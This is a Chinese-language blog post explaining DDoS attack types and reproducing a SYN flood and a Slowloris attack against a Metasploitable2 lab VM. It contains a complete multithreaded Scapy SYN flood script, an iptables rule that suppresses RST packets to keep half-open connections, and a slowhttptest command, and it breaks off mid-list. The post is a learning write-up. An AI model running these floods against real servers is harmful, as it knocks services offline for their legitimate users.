

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/portrait.jpg">
  <link rel="icon" href="/img/portrait.jpg">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="Lane Gong">
  <meta name="keywords" content="">
  
    <meta name="description" content="摘要： 本篇博客主要是记录了自己研究学习DDoS攻击的过程，从原理到实践，主要复现了SYN洪水攻击和Slowloris攻击。后续还值得更深层次学习，以及深入防御实现等问题。若有不足，欢迎指正交流！">
<meta property="og:type" content="article">
<meta property="og:title" content="DDoS攻击原理及实现">
<meta property="og:url" content="https://lanegong.github.io/posts/e097aaaf.html">
<meta property="og:site_name" content="Lane&#39;s Blog">
<meta property="og:description" content="摘要： 本篇博客主要是记录了自己研究学习DDoS攻击的过程，从原理到实践，主要复现了SYN洪水攻击和Slowloris攻击。后续还值得更深层次学习，以及深入防御实现等问题。若有不足，欢迎指正交流！">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://lanegong.github.io/images/postimage/fddos.jpeg">
<meta property="article:published_time" content="2022-05-11T16:00:00.000Z">
<meta property="article:modified_time" content="2022-05-12T01:33:04.363Z">
<meta property="article:author" content="Lane Gong">
<meta property="article:tag" content="DDoS">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://lanegong.github.io/images/postimage/fddos.jpeg">
  
  
  <title>DDoS攻击原理及实现 - Lane&#39;s Blog</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4/github-markdown.min.css" />
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/hint.css@2/hint.min.css" />

  
    
    
      
      
        
          
        
        <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/prismjs@1/themes/prism.min.css" />
      
      
        <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/prismjs@1/plugins/line-numbers/prism-line-numbers.min.css" />
      
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.css" />
  


<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"lanegong.github.io","root":"/","version":"1.8.14","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"baidu":"0aae2bb9475d846643a0f05755d8a37b","google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":"BQhkuiEuKDoNKUCuKndW69hb-MdYXbMMI","app_key":"rHe0dTOjfn4mDpT4f9RRkf4P","server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.4.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Lane の Blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                友链
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/background.jpeg') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="DDoS攻击原理及实现">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2022-05-12 00:00" pubdate>
        2022年5月12日 凌晨
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      7.2k 字
    </span>
  

  
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      61 分钟
    </span>
  

  
  
    
      <!-- LeanCloud 统计文章PV -->
      <span id="leancloud-page-views-container" class="post-meta" style="display: none">
        <i class="iconfont icon-eye" aria-hidden="true"></i>
        <span id="leancloud-page-views"></span> 次
      </span>
    
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">DDoS攻击原理及实现</h1>
            
            <div class="markdown-body">
              <h2 id="摘要"><a class="markdownIt-Anchor" href="#摘要"></a> 摘要：</h2>
<p>本篇博客主要是记录了自己研究学习DDoS攻击的过程，从原理到实践，主要复现了SYN洪水攻击和Slowloris攻击。后续还值得更深层次学习，以及深入防御实现等问题。若有不足，欢迎指正交流！</p>
<span id="more"></span>
<div class="note note-warning">
            <p>声明：本博客只是记录学习的过程，用以复习和互相交流学习，共同提升技术！切勿利用技术进行违法活动，后果自负！！维护国家网络安全是义不容辞的使命，网安人必将砥砺躬行！✊🏻</p>
          </div>
<h2 id="dos攻击"><a class="markdownIt-Anchor" href="#dos攻击"></a> DoS攻击</h2>
<p><strong>拒绝服务攻击（denial-of-service attack，简称DoS攻击）：</strong> 是一种网络攻击手法，其目的在于使目标电脑的网络或系统资源耗尽，使服务暂时中断或停止，导致其正常用户无法访问。</p>
<p>当黑客使用网络上两个或以上被攻陷的电脑作为“僵尸”向特定的目标发动“拒绝服务”式攻击时，称为<strong>分布式拒绝服务攻击（distributed denial-of-service attack，简称DDoS攻击）</strong> ,亦称洪水攻击。</p>
<h2 id="攻击现象"><a class="markdownIt-Anchor" href="#攻击现象"></a> 攻击现象</h2>
<p>美国国土安全部旗下的美国计算机应急准备小组（US-CERT）定义的拒绝服务攻击症状包括：</p>
<ol>
<li>网络异常缓慢（打开文件或访问网站）</li>
<li>特定网站无法访问</li>
<li>无法访问任何网站</li>
<li>垃圾邮件的数量急剧增加</li>
<li>无线或有线网络连接异常断开</li>
<li>长时间尝试访问网站或任何互联网服务时被拒绝</li>
<li>服务器容易断线、卡顿、访问延迟</li>
</ol>
<p>拒绝服务的攻击也可能会导致目标计算机同一网络中的其他计算机被攻击，互联网和局域网之间的带宽会被攻击导致大量消耗，不但影响目标计算机，同时也影响局域网中的其他电脑。如果攻击的规模较大，整个地区的网络连接都可能会受到影响。</p>
<h2 id="攻击来源"><a class="markdownIt-Anchor" href="#攻击来源"></a> 攻击来源</h2>
<ul>
<li>高性能服务器配合发包软件</li>
<li>可联网的设备(如打印机、摄像头、电视等等)</li>
<li>移动设备(数量多，增长速度快，其高性能利于组建僵尸网络)</li>
<li>个人PC(存在漏洞的PC或一些黑客迷自愿成为DDOS一员)</li>
<li>骇客控制的僵尸网络(僵尸网络又分为IRC型、HTTP型、P2P型)</li>
</ul>
<h2 id="流量特点"><a class="markdownIt-Anchor" href="#流量特点"></a> 流量特点</h2>
<ul>
<li>IP地址随机或固定某些IP段随机</li>
<li>没有完整完成三次握手</li>
<li>地址多数是伪造的</li>
<li>请求数量大、快</li>
</ul>
<h2 id="攻击方式及原理"><a class="markdownIt-Anchor" href="#攻击方式及原理"></a> 攻击方式及原理</h2>
<p>DoS攻击可以具体分成三种形式：带宽消耗型、资源消耗型、漏洞触发型。前两者都是透过大量合法或伪造的请求占用大量网络以及器材资源，以达到瘫痪网络以及系统的目的。而漏洞触发型，则是触发漏洞导致系统崩溃瘫痪服务。</p>
<p>以下攻击方式不完全👇</p>
<h3 id="带宽消耗型攻击"><a class="markdownIt-Anchor" href="#带宽消耗型攻击"></a> 带宽消耗型攻击</h3>
<p>DDoS带宽消耗攻击可以分为两个不同的层次；洪泛攻击或放大攻击。</p>
<ol>
<li>洪泛攻击的特点是利用僵尸程序发送大量流量至受损的受害者系统，目的在于堵塞其宽带。</li>
<li>放大攻击与其类似，是通过恶意放大流量限制受害者系统的宽带；其特点是利用僵尸程序通过伪造的源IP(即攻击目标IP)向某些存在漏洞的服务器发送请求，服务器在处理请求后向伪造的源IP发送应答，由于这些服务的特殊性导致应答包比请求包更长，因此使用少量的宽带就能使服务器发送大量的应答到目标主机上。</li>
</ol>
<ul>
<li>
<p>UDP洪水攻击（User Datagram Protocol floods）</p>
<p>UDP是一种无连接协议，当数据包通过UDP发送时，所有的数据包在发送和接收时不需要进行握手验证。当大量UDP数据包发送给受害系统时，可能会导致带宽饱和从而使得合法服务无法请求访问受害系统。遭受DDoS UDP洪泛攻击时，UDP数据包的目的端口可能是随机或指定的端口，受害系统将尝试处理接收到的数据包以确定本地运行的服务。如果没有应用程序在目标端口运行，受害系统将对源IP发出ICMP数据包，表明“目标端口不可达”。某些情况下，攻击者会伪造源IP地址以隐藏自己，这样从受害系统返回的数据包不会直接回到僵尸主机，而是被发送到被伪造地址的主机。有时UDP洪泛攻击也可能影响受害系统周围的网络连接，这可能导致受害系统附近的正常系统遇到问题。然而，这取决于网络体系结构和线速。</p>
<p><img src="/images/postimage/ddos1.png" srcset="/img/loading.gif" lazyload alt="" /></p>
</li>
<li>
<p>ICMP洪水攻击（ICMP floods）</p>
<p>ICMP洪水攻击是通过向未良好设置的路由器发送广播信息占用系统资源的做法。</p>
</li>
<li>
<p>Smurf攻击</p>
<p>攻击者向网关发送ICMP请求包，并将该ICMP请求报文的源地址伪造成受害主机IP地址，目的地址为广播地址。路由器在接受到该数据包，发现目的地址是广播地址，就会将该数据包广播出去，局域网内所有的存活主机都会受到一个ICMP请求包，源地址是受害主机IP。接下来受害主机就会收到该网络内所有主机发来的ICMP应答报文，通过大量返回的ICMP应答报文来淹没受害主机，最终导致网络阻塞，受害主机崩溃。</p>
<p><img src="/images/postimage/ddos2.png" srcset="/img/loading.gif" lazyload alt="" /></p>
</li>
</ul>
<h3 id="资源消耗型攻击"><a class="markdownIt-Anchor" href="#资源消耗型攻击"></a> 资源消耗型攻击</h3>
<ul>
<li>
<p>协议分析攻击（SYN flood，SYN洪水）</p>
<p>传送控制协议（TCP）同步（SYN）攻击。TCP进程通常包括发送者和接受者之间在数据包发送之前创建的完全信号交换。启动系统发送一个SYN请求，接收系统返回一个带有自己SYN请求的ACK（确认）作为交换。发送系统接着传回自己的ACK来授权两个系统间的通讯。若接收系统发送了SYN数据包，但没接收到ACK，接受者经过一段时间后会再次发送新的SYN数据包。接受系统中的处理器和内存资源将存储该TCP SYN的请求直至超时。DDoS TCP SYN攻击也被称为“资源耗尽攻击”，它利用TCP功能将僵尸程序伪装的TCP SYN请求发送给受害服务器，从而饱和服务处理器资源并阻止其有效地处理合法请求。它专门利用发送系统和接收系统间的三向信号交换来发送大量欺骗性的原IP地址TCP SYN数据包给受害系统。最终，大量TCP SYN攻击请求反复发送，导致受害系统内存和处理器资源耗尽，致使其无法处理任何合法用户的请求。</p>
<blockquote>
<p><mark>关于TCP协议可参考[]</mark></p>
</blockquote>
<p><img src="/images/postimage/ddos3.jpeg" srcset="/img/loading.gif" lazyload alt="" /></p>
</li>
<li>
<p>LAND攻击</p>
<p>这种攻击方式与SYN floods类似，不过在LAND攻击包中的原地址和目标地址都是攻击对象的IP。这种攻击会导致被攻击的机器死循环，最终耗尽资源而死机。</p>
<p><img src="/images/postimage/ddos4.png" srcset="/img/loading.gif" lazyload alt="" /></p>
</li>
<li>
<p>CC攻击（Distributed HTTP flood，分布式HTTP洪水攻击）</p>
<p>CC攻击（ChallengeCollapsar），攻击者控制肉鸡、僵尸网络或使用代理服务器向受害服务器发送大量貌似合法的请求（通常为HTTP GET)，使得正常用户的web请求处理缓慢甚至得不到处理，制造大量的后台数据库查询动作，消耗目标CPU资源，最终导致服务器宕机崩溃。攻击者创造性地使用代理，利用广泛可用的免费代理服务器发动DDoS攻击。许多免费代理服务器支持匿名，这使追踪变得非常困难。</p>
<p><img src="/images/postimage/ddos5.png" srcset="/img/loading.gif" lazyload alt="" /></p>
</li>
<li>
<p>僵尸网络攻击</p>
<p>僵尸网络是指大量被命令与控制（C&amp;C）服务器所控制的互联网主机群。攻击者传播恶意软件并组成自己的僵尸网络。僵尸网络难于检测的原因是，僵尸主机只有在执行特定指令时才会与服务器进行通讯，使得它们隐蔽且不易察觉。僵尸网络根据网络通讯协议的不同分为IRC、HTTP或P2P类等。</p>
</li>
<li>
<p>应用程序级洪水攻击（Application level floods）</p>
<p>与前面叙说的攻击方式不同，应用程序级洪水攻击主要是针对应用软件层的，也就是高于OSI的。它同样是以大量消耗系统资源为目的，通过向IIS这样的网络服务程序提出无节制的资源申请来破坏正常的网络服务。</p>
</li>
</ul>
<h3 id="漏洞触发型"><a class="markdownIt-Anchor" href="#漏洞触发型"></a> 漏洞触发型</h3>
<p>这类攻击手法，透过尝试触发缓存溢出等漏洞，使操作系统发生核心错误或蓝屏死机，达到拒绝服务攻击。</p>
<ul>
<li>
<p>死亡之Ping（ping of death）</p>
<p>死亡之Ping是产生超过IP协议能容忍的数据包数，若系统没有检查机制，就会宕机。</p>
</li>
<li>
<p>泪滴攻击（TearDrop 攻击）</p>
<p>每个资料要发送前，该数据包都会经过切割，每个小切割都会记录位移的信息，以便重组，但此攻击模式就是捏造位移信息，造成重组时发生问题，造成错误。</p>
<blockquote>
<p><mark>关于数据包切割可参考：<a href="">计算机网络①</a></mark></p>
<p>这种攻击主要对旧的windows版本和Linux版本有效</p>
</blockquote>
<p><img src="/images/postimage/ddos6.png" srcset="/img/loading.gif" lazyload alt="" /></p>
</li>
</ul>
<h2 id="ddos攻击实战"><a class="markdownIt-Anchor" href="#ddos攻击实战"></a> DDoS攻击实战</h2>
<div class="note note-info">
            <p>准确说所做的实验叫做DoS攻击，但资源有限，如果多台主机使用同种方式攻击服务器，同样会产生DDoS的效果，故仍称为DDoS攻击。</p>
          </div>
<h3 id="syn-flood攻击"><a class="markdownIt-Anchor" href="#syn-flood攻击"></a> SYN Flood攻击</h3>
<h4 id="环境搭建"><a class="markdownIt-Anchor" href="#环境搭建"></a> 环境搭建</h4>
<p>漏洞演练系统/靶机：Metasploitable2</p>
<blockquote>
<p>下载地址：<a target="_blank" rel="noopener" href="https://sourceforge.net/projects/metasploitable/">https://sourceforge.net/projects/metasploitable/</a> （⚠️下载好的linux系统软件需要用虚拟机软件打开）</p>
</blockquote>
<p>系统环境：MacOS 11.3.1</p>
<p>虚拟机：Parallel Desktop17、UTM</p>
<p>Kali Linux版本：2021.4a</p>
<ol>
<li>
<p>正常情况下：解压下载下来的Metasploitable压缩包，直接用虚拟机打开Metasploitable.vmx(虚拟机文件)，parallel可以直接右键文件打开方式选择parallel新建</p>
<p>⚠️由于Metasploitable2基于Intelx86架构，不支持M1arm64架构，破防，就知道没有这么顺利…</p>
<p><strong>解决方式：</strong></p>
<ul>
<li>
<p>在该文件夹位置新建终端页面，执行<code>brew install qemu</code></p>
<p>小建议：执行前先<code>brew update</code>和<code>brew upgrade</code></p>
</li>
<li>
<p>执行命令：<code>qemu-img convert -p -O qcow2 Metasploitable.vmdk Metasploitable.qcow2</code></p>
</li>
<li>
<p>使用UTM虚拟机，parallel好像无法直接运行选择.qcow2，故大改大改</p>
<blockquote>
<p>官网下载地址：<a target="_blank" rel="noopener" href="https://mac.getutm.app/">https://mac.getutm.app/</a></p>
</blockquote>
</li>
<li>
<p>新建虚拟机 --&gt; 选择“模拟”，速度较慢，但虚拟机的cpu架构不受限制🥳 --&gt; “其他” --&gt; “暂不导入光盘镜像” --&gt; “下一步” --&gt; 内存1024MB --&gt; 一路next，最后save</p>
</li>
<li>
<p>右上角编辑选择的虚拟机</p>
</li>
<li>
<p>IDE Drive–&gt;删除硬盘</p>
</li>
<li>
<p>QEMU–&gt; remove UEFI启动</p>
</li>
<li>
<p>新建硬盘–&gt; 导入Metasploitable.qcow2 --&gt; 保存</p>
</li>
<li>
<p>启动虚拟机</p>
</li>
</ul>
<p><img src="/images/postimage/ddos7.png" srcset="/img/loading.gif" lazyload alt="" /></p>
<p>直接一整个大感动！！！！万分感谢<a target="_blank" rel="noopener" href="https://www.youtube.com/watch?v=bqdu_0JtkPI">Metasploitable 2 on ARM</a>此视频给予的帮助！！！</p>
</li>
<li>
<p>默认的用户名是 ：msfadmin 密码是： msfadmin</p>
<p>即可登录进metasploitable2。查看其ip</p>
<p><img src="/images/postimage/ddos8.png" srcset="/img/loading.gif" lazyload alt="" /></p>
</li>
<li>
<p>整个攻击将metasploitable2作为被攻击服务器，攻击主机采用kali linux。在kali上访问以metasploitable2作为服务器提供的Web服务。</p>
<p><img src="/images/postimage/ddos9.png" srcset="/img/loading.gif" lazyload alt="" /></p>
<p>此时可正常访问服务器上的Web服务。</p>
</li>
</ol>
<h4 id="模拟攻击"><a class="markdownIt-Anchor" href="#模拟攻击"></a> 模拟攻击</h4>
<p>使用python的scapy模块来根据攻击思路进行数据包构造并模拟发包</p>
<p>Scapy 是一个强大的基于 Python 的交互式数据包操作程序和库。它能够伪造或解码大量协议的数据包，在线发送它们，捕获它们，使用 pcap 文件存储或读取它们，匹配请求和回复等等。它旨在通过使用有效的默认值来实现快速数据包原型设计。</p>
<p><img src="/images/postimage/ddos10.png" srcset="/img/loading.gif" lazyload alt="" /></p>
<h5 id="单个请求尝试"><a class="markdownIt-Anchor" href="#单个请求尝试"></a> 单个请求尝试</h5>
<div class="code-wrapper"><pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token comment">#单个请求尝试</span>
i<span class="token operator">=</span>IP<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token comment">#创建一个IP数据包</span>
i<span class="token punctuation">.</span>dst<span class="token operator">=</span><span class="token string">"192.168.64.2"</span><span class="token comment">#源地址src，目标地址dst，i=IP(dst="192.168.64.2")</span>
t<span class="token operator">=</span>TCP<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token comment">#创建一个TCP数据包</span>
t<span class="token punctuation">.</span>dport<span class="token operator">=</span><span class="token number">80</span><span class="token comment">#目标机端口，同样可以写在函数参数上</span>
sr1<span class="token punctuation">(</span>i<span class="token operator">/</span>t<span class="token punctuation">,</span>verbose<span class="token operator">=</span><span class="token number">1</span><span class="token punctuation">,</span>timeout<span class="token operator">=</span><span class="token number">2</span><span class="token punctuation">)</span><span class="token comment">#sr,sr1用于第三层，srp用于第二层，发送数据包同时还会接收返回的内容</span>
<span class="token comment">#sr1和sr的区别在于sr1返回的只有应答包，没有未应答包</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre></div>
<div class="code-wrapper"><pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token comment">#说明</span>
i<span class="token operator">/</span>t<span class="token operator">=</span>IP<span class="token punctuation">(</span>dst<span class="token operator">=</span><span class="token string">"192.168.64.2"</span><span class="token punctuation">)</span><span class="token operator">/</span>TCP<span class="token punctuation">(</span>dport<span class="token operator">=</span><span class="token number">80</span><span class="token punctuation">)</span>
<span class="token comment">#很多时候一个数据包是由多个协议组成的，组成形式使用/分割，协议顺序由底层逐渐向上，例如构造一个tcp数据包：tcp = Ether()/IP()/TCP()</span>
verbose<span class="token operator">=</span><span class="token number">1</span><span class="token comment">#verbose – set verbosity level,verbose是否显示发包信息</span>
<span class="token comment">#verbose=0表示不显示正在发送的信息</span>
<span class="token comment">#当verbose=1表示显示发包信息</span>
timeout<span class="token operator">=</span><span class="token number">2</span><span class="token comment">#timeout – how much time to wait after the last packet has been sent</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre></div>
<p><img src="/images/postimage/ddos11.png" srcset="/img/loading.gif" lazyload alt="" /></p>
<p>通过ip和tcp组合发送了一个数据包请求，端口为80，flags为S，即SYN开始会话，返回的数据包中可以看到flags的值为SA，即SYN/ACK响应包，此为正常返回，证明目标机80端口开放。此后并没有发送后续也就是第三次握手的ack响应包==》半开扫描</p>
<p>在发送数据包的同时通过WireShark抓包</p>
<p><img src="/images/postimage/ddos12.png" srcset="/img/loading.gif" lazyload alt="" /></p>
<p>抓包结果可以清楚看到第三个数据包是RST数据包而不是ACK数据包==》这个RST数据包是系统自己发送的，原因在于一开始的SYN数据包是使用scapy发出的，并不是操作系统自己主动发出的，所以当操作系统收到一个SYN+ACK数据包时，它会认为这个连接不是我发出的，就会主动拒绝连接，并返回RST数据包。</p>
<p>因为此机制导致建立不了SYN洪水攻击需要的半开连接效果，通过scapy构造的相关数据包会被源主机系统直接拒连返回[RST]断开连接了，起不到占用服务器资源的情况。应该是服务器返回S/A后，源主机无回应，导致服务器经过一段时间后会再次发送新的SYN数据包，服务器中的处理器和内存资源将存储该TCP SYN的请求直至超时，通过大量发SYN请求，耗尽服务器的资源。</p>
<p>措施：使用iptables命令禁止系统自动给目标发送RST数据包</p>
<p>命令：<code>iptables -A OUTPUT -p tcp --tcp-flags RST RST -d 192.168.64.2 -j DROP</code></p>
<h5 id="syn-flood攻击-2"><a class="markdownIt-Anchor" href="#syn-flood攻击-2"></a> SYN Flood攻击</h5>
<p>以上面构造数据包的思路+多线程模块==》攻击脚本</p>
<div class="code-wrapper"><pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token comment">#攻击脚本</span>
<span class="token keyword">from</span> scapy<span class="token punctuation">.</span><span class="token builtin">all</span> <span class="token keyword">import</span> <span class="token operator">*</span>
<span class="token keyword">from</span> time <span class="token keyword">import</span> sleep
<span class="token keyword">import</span> threading
<span class="token keyword">import</span> random

<span class="token keyword">def</span> <span class="token function">syn_flood</span><span class="token punctuation">(</span>target<span class="token punctuation">,</span>port<span class="token punctuation">)</span><span class="token punctuation">:</span>
	<span class="token keyword">while</span> <span class="token number">1</span><span class="token punctuation">:</span>
		rand<span class="token operator">=</span>random<span class="token punctuation">.</span>randint<span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">,</span><span class="token number">65535</span><span class="token punctuation">)</span>
		send<span class="token punctuation">(</span>IP<span class="token punctuation">(</span>dst<span class="token operator">=</span>target<span class="token punctuation">)</span><span class="token operator">/</span>TCP<span class="token punctuation">(</span>dport<span class="token operator">=</span>port<span class="token punctuation">,</span>sport<span class="token operator">=</span>rand<span class="token punctuation">)</span><span class="token punctuation">,</span>verbose<span class="token operator">=</span><span class="token number">0</span><span class="token punctuation">)</span>
		
<span class="token keyword">def</span> <span class="token function">main</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
	<span class="token keyword">if</span> <span class="token builtin">len</span><span class="token punctuation">(</span>sys<span class="token punctuation">.</span>argv<span class="token punctuation">)</span><span class="token operator">!=</span><span class="token number">4</span><span class="token punctuation">:</span>
		<span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">"参数错误，用法如下："</span><span class="token punctuation">)</span>
		<span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">"python syn_flood.py [IP] [port] [threadcount]"</span><span class="token punctuation">)</span>
		sys<span class="token punctuation">.</span>exit<span class="token punctuation">(</span><span class="token punctuation">)</span>

	target<span class="token operator">=</span>sys<span class="token punctuation">.</span>argv<span class="token punctuation">[</span><span class="token number">1</span><span class="token punctuation">]</span>
	port<span class="token operator">=</span><span class="token builtin">int</span><span class="token punctuation">(</span>sys<span class="token punctuation">.</span>argv<span class="token punctuation">[</span><span class="token number">2</span><span class="token punctuation">]</span><span class="token punctuation">)</span>
	thread_count<span class="token operator">=</span><span class="token builtin">int</span><span class="token punctuation">(</span>sys<span class="token punctuation">.</span>argv<span class="token punctuation">[</span><span class="token number">3</span><span class="token punctuation">]</span><span class="token punctuation">)</span>
	<span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">"SYN Flood start,press ctrl+C to stop!"</span><span class="token punctuation">)</span>

	<span class="token keyword">for</span> i <span class="token keyword">in</span> <span class="token builtin">range</span><span class="token punctuation">(</span>thread_count<span class="token punctuation">)</span><span class="token punctuation">:</span>
		xthread<span class="token operator">=</span>threading<span class="token punctuation">.</span>Thread<span class="token punctuation">(</span>target<span class="token operator">=</span>syn_flood<span class="token punctuation">,</span>args<span class="token operator">=</span><span class="token punctuation">(</span>target<span class="token punctuation">,</span>port<span class="token punctuation">)</span><span class="token punctuation">)</span>
		xthread<span class="token punctuation">.</span>start<span class="token punctuation">(</span><span class="token punctuation">)</span>
	<span class="token keyword">while</span> <span class="token number">1</span><span class="token punctuation">:</span>
		sleep<span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span>
	
<span class="token keyword">if</span> __name__<span class="token operator">==</span><span class="token string">"__main__"</span><span class="token punctuation">:</span>
	main<span class="token punctuation">(</span><span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre></div>
<p>Terminal command：<code>python3 syn_flood.py 192.168.64.2 80 20</code></p>
<p><img src="/images/postimage/ddos13.png" srcset="/img/loading.gif" lazyload alt="" /></p>
<p><img src="/images/postimage/ddos14.png" srcset="/img/loading.gif" lazyload alt="" /></p>
<p>可以发现目标服务器的web应用已经无法访问。</p>
<p>此时继续抓包观察：</p>
<p><img src="/images/postimage/ddos15.png" srcset="/img/loading.gif" lazyload alt="" /></p>
<p>可观察到大量SYN请求包及服务器返回的SYN/ACK数据包，已无RST包</p>
<p>登陆服务器查看服务器建立的连接：命令<code>netstat -pantu | grep SYN</code></p>
<p><img src="/images/postimage/ddos16.png" srcset="/img/loading.gif" lazyload alt="" /></p>
<p>可发现已建立了大量的SYN连接，因为我的攻击主机和metasploitable不在同一网段，所以连接显示的是服务器所在网段的网关。</p>
<h3 id="http慢速攻击"><a class="markdownIt-Anchor" href="#http慢速攻击"></a> HTTP慢速攻击</h3>
<p>本次攻击主要借助工具slowhttptest</p>
<p>Kali Linux Terminal command：<code>apt install slowhttptest -y</code></p>
<blockquote>
<p>该工具提供了多种攻击方式，以下选择Slowloris进行实验</p>
</blockquote>
<h4 id="slowloris攻击"><a class="markdownIt-Anchor" href="#slowloris攻击"></a> Slowloris攻击</h4>
<p>原理：Web应用在处理HTTP请求之前都要先接收完所有的HTTP头部，Web服务器在没接收到2个连续的\r\n时，会认为客户端没有发送完头部，而持续的等待客户端发送数据，消耗服务器的连接和内存资源。</p>
<p>实施攻击：<code>slowhttptest -c 1000 -H -g -o my_header_stats -i 10 -r 200 -t GET -u http://192.168.64.2 -x 24 -p 3</code></p>
<p>参数解释：</p>
<ul>
<li>-c 连接数 连接数限制为65539</li>
<li>-H 指定在标头部分中放慢速度</li>
<li>-i 秒 每个连接的后续数据之间的间隔（以秒为单位）</li>
<li>-g 生成统计数据在CSV和HTML格式,模式是缓慢的xxx.csv/html,其中xxx是时间和日期</li>
<li>-o 文件 定制输出文件的路径和/或名称，如果指定了-g，则有效</li>
<li>每秒-r个连接 连接率</li>
